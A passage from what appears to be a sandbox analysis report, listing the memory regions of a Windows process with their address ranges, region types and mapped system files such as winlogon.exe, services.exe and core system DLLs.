monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1698
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1699
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1700
start_va = 0xd0000
end_va = 0x136fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1701
start_va = 0x140000
end_va = 0x140fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 1702
start_va = 0x150000
end_va = 0x150fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 1703
start_va = 0x160000
end_va = 0x25ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 1704
start_va = 0x260000
end_va = 0x35ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000260000"
filename = ""
Region:
id = 1705
start_va = 0x360000
end_va = 0x36cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 1706
start_va = 0x370000
end_va = 0x37ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000370000"
filename = ""
Region:
id = 1707
start_va = 0x380000
end_va = 0x507fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000380000"
filename = ""
Region:
id = 1708
start_va = 0x510000
end_va = 0x690fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000510000"
filename = ""
Region:
id = 1709
start_va = 0x6a0000
end_va = 0x75ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006a0000"
filename = ""
Region:
id = 1710
start_va = 0x760000
end_va = 0x79ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000760000"
filename = ""
Region:
id = 1711
start_va = 0x7a0000
end_va = 0x7bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007a0000"
filename = ""
Region:
id = 1712
start_va = 0x7c0000
end_va = 0x83ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007c0000"
filename = ""
Region:
id = 1713
start_va = 0x840000
end_va = 0x85ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000840000"
filename = ""
Region:
id = 1714
start_va = 0x860000
end_va = 0x87ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000860000"
filename = ""
Region:
id = 1715
start_va = 0x880000
end_va = 0x880fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000880000"
filename = ""
Region:
id = 1716
start_va = 0x890000
end_va = 0x891fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000890000"
filename = ""
Region:
id = 1717
start_va = 0x8a0000
end_va = 0x8a0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008a0000"
filename = ""
Region:
id = 1718
start_va = 0x8b0000
end_va = 0x8b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008b0000"
filename = ""
Region:
id = 1719
start_va = 0x900000
end_va = 0x9fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000900000"
filename = ""
Region:
id = 1720
start_va = 0xa00000
end_va = 0xa7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a00000"
filename = ""
Region:
id = 1721
start_va = 0xa80000
end_va = 0xd4efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1722
start_va = 0xd50000
end_va = 0xdb1fff
monitored = 0
entry_point = 0xd608d8
region_type = mapped_file
name = "winlogon.exe"
filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe")
Region:
id = 1723
start_va = 0xdc0000
end_va = 0xdc1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000dc0000"
filename = ""
Region:
id = 1724
start_va = 0xdd0000
end_va = 0xdd0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000dd0000"
filename = ""
Region:
id = 1725
start_va = 0xde0000
end_va = 0xde0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000de0000"
filename = ""
Region:
id = 1726
start_va = 0xdf0000
end_va = 0xdf0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000df0000"
filename = ""
Region:
id = 1727
start_va = 0xe00000
end_va = 0xe00fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e00000"
filename = ""
Region:
id = 1728
start_va = 0xe10000
end_va = 0xe10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000e10000"
filename = ""
Region:
id = 1729
start_va = 0xe20000
end_va = 0xe27fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e20000"
filename = ""
Region:
id = 1730
start_va = 0xe30000
end_va = 0xf2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 1731
start_va = 0xf70000
end_va = 0xfeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f70000"
filename = ""
Region:
id = 1732
start_va = 0x1030000
end_va = 0x10affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001030000"
filename = ""
Region:
id = 1733
start_va = 0x10b0000
end_va = 0x112ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010b0000"
filename = ""
Region:
id = 1734
start_va = 0x1150000
end_va = 0x11cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001150000"
filename = ""
Region:
id = 1735
start_va = 0x1220000
end_va = 0x129ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001220000"
filename = ""
Region:
id = 1736
start_va = 0x1330000
end_va = 0x13affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001330000"
filename = ""
Region:
id = 1737
start_va = 0x13e0000
end_va = 0x145ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000013e0000"
filename = ""
Region:
id = 1738
start_va = 0x14d0000
end_va = 0x154ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000014d0000"
filename = ""
Region:
id = 1739
start_va = 0x1550000
end_va = 0x174ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001550000"
filename = ""
Region:
id = 1740
start_va = 0x1750000
end_va = 0x17cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001750000"
filename = ""
Region:
id = 1741
start_va = 0x17d0000
end_va = 0x184ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000017d0000"
filename = ""
Region:
id = 1742
start_va = 0x1870000
end_va = 0x18effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001870000"
filename = ""
Region:
id = 1743
start_va = 0x18f0000
end_va = 0x196ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000018f0000"
filename = ""
Region:
id = 1744
start_va = 0x1990000
end_va = 0x1a0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001990000"
filename = ""
Region:
id = 1745
start_va = 0x1a30000
end_va = 0x1aaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a30000"
filename = ""
Region:
id = 1746
start_va = 0x1b70000
end_va = 0x1c6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b70000"
filename = ""
Region:
id = 1747
start_va = 0x1c70000
end_va = 0x1ceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c70000"
filename = ""
Region:
id = 1748
start_va = 0x1cf0000
end_va = 0x20f2fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001cf0000"
filename = ""
Region:
id = 1749
start_va = 0x2100000
end_va = 0x24fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002100000"
filename = ""
Region:
id = 1750
start_va = 0x25b0000
end_va = 0x262ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 1751
start_va = 0x2740000
end_va = 0x27bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002740000"
filename = ""
Region:
id = 1752
start_va = 0x28e0000
end_va = 0x295ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000028e0000"
filename = ""
Region:
id = 1753
start_va = 0x2a30000
end_va = 0x2aaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a30000"
filename = ""
Region:
id = 1754
start_va = 0x2b00000
end_va = 0x2b7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b00000"
filename = ""
Region:
id = 1755
start_va = 0x2b80000
end_va = 0x337ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b80000"
filename = ""
Region:
id = 1756
start_va = 0x775e0000
end_va = 0x776d9fff
monitored = 0
entry_point = 0x775fa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1757
start_va = 0x776e0000
end_va = 0x777fefff
monitored = 0
entry_point = 0x776f5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1758
start_va = 0x77800000
end_va = 0x779a8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1759
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1760
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1761
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1762
start_va = 0xff030000
end_va = 0xff082fff
monitored = 0
entry_point = 0xff043310
region_type = mapped_file
name = "services.exe"
filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe")
Region:
id = 1763
start_va = 0xff300000
end_va = 0xff30afff
monitored = 0
entry_point = 0xff30246c
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 1764
start_va = 0xff430000
end_va = 0xff491fff
monitored = 0
entry_point = 0xff4408d8
region_type = mapped_file
name = "winlogon.exe"
filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe")
Region:
id = 1765
start_va = 0x7fef03e0000
end_va = 0x7fef048dfff
monitored = 0
entry_point = 0x7fef03e4104
region_type = mapped_file
name = "wuapi.dll"
filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll")
Region:
id = 1766
start_va = 0x7fef0fc0000
end_va = 0x7fef10e4fff
monitored = 0
entry_point = 0x7fef1011570
region_type = mapped_file
name = "dbghelp.dll"
filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll")
Region:
id = 1767
start_va = 0x7fef1300000
end_va = 0x7fef131bfff
monitored = 0
entry_point = 0x7fef1301060
region_type = mapped_file
name = "wscsvc.dll"
filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll")
Region:
id = 1768
start_va = 0x7fef50a0000
end_va = 0x7fef50b2fff
monitored = 0
entry_point = 0x7fef50a1d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 1769
start_va = 0x7fef5310000
end_va = 0x7fef531dfff
monitored = 0
entry_point = 0x7fef5315500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 1770
start_va = 0x7fef5320000
end_va = 0x7fef5346fff
monitored = 0
entry_point = 0x7fef53211a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 1771
start_va = 0x7fef5350000
end_va = 0x7fef5422fff
monitored = 0
entry_point = 0x7fef53c8b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 1772
start_va = 0x7fef56c0000
end_va = 0x7fef5736fff
monitored = 0
entry_point = 0x7fef56fe7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 1773
start_va = 0x7fef7f60000
end_va = 0x7fef7f7afff
monitored = 0
entry_point = 0x7fef7f61198
region_type = mapped_file
name = "cabinet.dll"
filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll")
Region:
id = 1774
start_va = 0x7fef85d0000
end_va = 0x7fef861efff
monitored = 0
entry_point = 0x7fef85d2760
region_type = mapped_file
name = "audioses.dll"
filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll")
Region:
id = 1775
start_va = 0x7fef9100000
end_va = 0x7fef9117fff
monitored = 0
entry_point = 0x7fef9101bf8
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 1776
start_va = 0x7fef9120000
end_va = 0x7fef9130fff
monitored = 0
entry_point = 0x7fef91216ac
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 1777
start_va = 0x7fef91e0000
end_va = 0x7fef921afff
monitored = 0
entry_point = 0x7fef91e4520
region_type = mapped_file
name = "dhcpcore6.dll"
filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll")
Region:
id = 1778
start_va = 0x7fef9220000
end_va = 0x7fef9270fff
monitored = 0
entry_point = 0x7fef922f6c0
region_type = mapped_file
name = "dhcpcore.dll"
filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll")
Region:
id = 1779
start_va = 0x7fef9290000
end_va = 0x7fef9297fff
monitored = 0
entry_point = 0x7fef929284c
region_type = mapped_file
name = "nrpsrv.dll"
filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll")
Region:
id = 1780
start_va = 0x7fef92a0000
end_va = 0x7fef92a9fff
monitored = 0
entry_point = 0x7fef92a1adc
region_type = mapped_file
name = "lmhsvc.dll"
filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll")
Region:
id = 1781
start_va = 0x7fefb230000
end_va = 0x7fefb23afff
monitored = 0
entry_point = 0x7fefb231198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 1782
start_va = 0x7fefb240000
end_va = 0x7fefb266fff
monitored = 0
entry_point = 0x7fefb2498bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 1783
start_va = 0x7fefb6e0000
end_va = 0x7fefb6e8fff
monitored = 0
entry_point = 0x7fefb6e1010
region_type = mapped_file
name = "avrt.dll"
filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll")
Region:
id = 1784
start_va = 0x7fefb6f0000
end_va = 0x7fefb71bfff
monitored = 0
entry_point = 0x7fefb6f15c4
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 1785
start_va = 0x7fefb720000
end_va = 0x7fefb7cbfff
monitored = 0
entry_point = 0x7fefb736acc
region_type = mapped_file
name = "audiosrv.dll"
filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll")
Region:
id = 1786
start_va = 0x7fefb940000
end_va = 0x7fefb954fff
monitored = 0
entry_point = 0x7fefb941050
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 1787
start_va = 0x7fefb960000
end_va = 0x7fefb96bfff
monitored = 0
entry_point = 0x7fefb9618a4
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 1788
start_va = 0x7fefbc60000
end_va = 0x7fefbcaafff
monitored = 0
entry_point = 0x7fefbc6efcc
region_type = mapped_file
name = "mmdevapi.dll"
filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll")
Region:
id = 1789
start_va = 0x7fefc0d0000
end_va = 0x7fefc1fbfff
monitored = 0
entry_point = 0x7fefc0d94bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1790
start_va = 0x7fefc740000
end_va = 0x7fefc76cfff
monitored = 0
entry_point = 0x7fefc741010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1791
start_va = 0x7fefc770000
end_va = 0x7fefc905fff
monitored = 0
entry_point = 0x7fefc7778e4
region_type = mapped_file
name = "wevtsvc.dll"
filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll")
Region:
id = 1792
start_va = 0x7fefc910000
end_va = 0x7fefc91bfff
monitored = 0
entry_point = 0x7fefc911064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1793
start_va = 0x7fefc920000
end_va = 0x7fefc9dafff
monitored = 0
entry_point = 0x7fefc926de0
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 1794
start_va = 0x7fefc9e0000
end_va = 0x7fefc9e6fff
monitored = 0
entry_point = 0x7fefc9e14b0
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 1795
start_va = 0x7fefcad0000
end_va = 0x7fefcaeafff
monitored = 0
entry_point = 0x7fefcad2068
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 1796
start_va = 0x7fefcaf0000
end_va = 0x7fefcb0dfff
monitored = 0
entry_point = 0x7fefcaf13b8
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1797
start_va = 0x7fefcc40000
end_va = 0x7fefcc49fff
monitored = 0
entry_point = 0x7fefcc43cb8
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 1798
start_va = 0x7fefcd40000
end_va = 0x7fefcd86fff
monitored = 0
entry_point = 0x7fefcd41064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1799
start_va = 0x7fefce60000
end_va = 0x7fefcebafff
monitored = 0
entry_point = 0x7fefce66940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 1800
start_va = 0x7fefcfd0000
end_va = 0x7fefcfd6fff
monitored = 0
entry_point = 0x7fefcfd142c
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 1801
start_va = 0x7fefcfe0000
end_va = 0x7fefd034fff
monitored = 0
entry_point = 0x7fefcfe1054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1802
start_va = 0x7fefd040000
end_va = 0x7fefd057fff
monitored = 0
entry_point = 0x7fefd043b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1803
start_va = 0x7fefd190000
end_va = 0x7fefd1b1fff
monitored = 0
entry_point = 0x7fefd195d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1804
start_va = 0x7fefd250000
end_va = 0x7fefd2bcfff
monitored = 0
entry_point = 0x7fefd251010
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 1805
start_va = 0x7fefd5e0000
end_va = 0x7fefd5eafff
monitored = 0
entry_point = 0x7fefd5e1030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 1806
start_va = 0x7fefd610000
end_va = 0x7fefd634fff
monitored = 0
entry_point = 0x7fefd619658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1807
start_va = 0x7fefd640000
end_va = 0x7fefd64efff
monitored = 0
entry_point = 0x7fefd641010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1808
start_va = 0x7fefd6f0000
end_va = 0x7fefd72cfff
monitored = 0
entry_point = 0x7fefd6f18f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 1809
start_va = 0x7fefd730000
end_va = 0x7fefd743fff
monitored = 0
entry_point = 0x7fefd7310e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1810
start_va = 0x7fefd750000
end_va = 0x7fefd75efff
monitored = 0
entry_point = 0x7fefd7519b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1811
start_va = 0x7fefd7f0000
end_va = 0x7fefd7fefff
monitored = 0
entry_point = 0x7fefd7f1020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1812
start_va = 0x7fefd800000
end_va = 0x7fefd96cfff
monitored = 0
entry_point = 0x7fefd8010b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1813
start_va = 0x7fefd970000
end_va = 0x7fefd9dbfff
monitored = 0
entry_point = 0x7fefd972780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1814
start_va = 0x7fefd9e0000
end_va = 0x7fefda1afff
monitored = 0
entry_point = 0x7fefd9e1324
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 1815
start_va = 0x7fefda20000
end_va = 0x7fefda55fff
monitored = 0
entry_point = 0x7fefda21474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1816
start_va = 0x7fefda60000
end_va = 0x7fefda79fff
monitored = 0
entry_point = 0x7fefda61558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1817
start_va = 0x7fefdca0000
end_va = 0x7fefdd38fff
monitored = 0
entry_point = 0x7fefdca1c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1818
start_va = 0x7fefdd40000
end_va = 0x7fefde6cfff
monitored = 0
entry_point = 0x7fefdd8ed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1819
start_va = 0x7fefde70000
end_va = 0x7fefded6fff
monitored = 0
entry_point = 0x7fefde7b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1820
start_va = 0x7fefec70000
end_va = 0x7fefed78fff
monitored = 0
entry_point = 0x7fefec71064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1821
start_va = 0x7fefef30000
end_va = 0x7fefefa0fff
monitored = 0
entry_point = 0x7fefef41e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1822
start_va = 0x7fefefb0000
end_va = 0x7feff08afff
monitored = 0
entry_point = 0x7fefefd0760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1823
start_va = 0x7feff090000
end_va = 0x7feff12efff
monitored = 0
entry_point = 0x7feff0925a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1824
start_va = 0x7feff130000
end_va = 0x7feff137fff
monitored = 0
entry_point = 0x7feff131504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1825
start_va = 0x7feff140000
end_va = 0x7feff15efff
monitored = 0
entry_point = 0x7feff1460e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1826
start_va = 0x7feff180000
end_va = 0x7feff1d1fff
monitored = 0
entry_point = 0x7feff1810d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 1827
start_va = 0x7feff1e0000
end_va = 0x7feff2b6fff
monitored = 0
entry_point = 0x7feff1e3274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1828
start_va = 0x7feff2c0000
end_va = 0x7feff2edfff
monitored = 0
entry_point = 0x7feff2c1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1829
start_va = 0x7feff2f0000
end_va = 0x7feff4f2fff
monitored = 0
entry_point = 0x7feff313330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1830
start_va = 0x7feff5a0000
end_va = 0x7feff5adfff
monitored = 0
entry_point = 0x7feff5a1080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1831
start_va = 0x7feff5b0000
end_va = 0x7feff678fff
monitored = 0
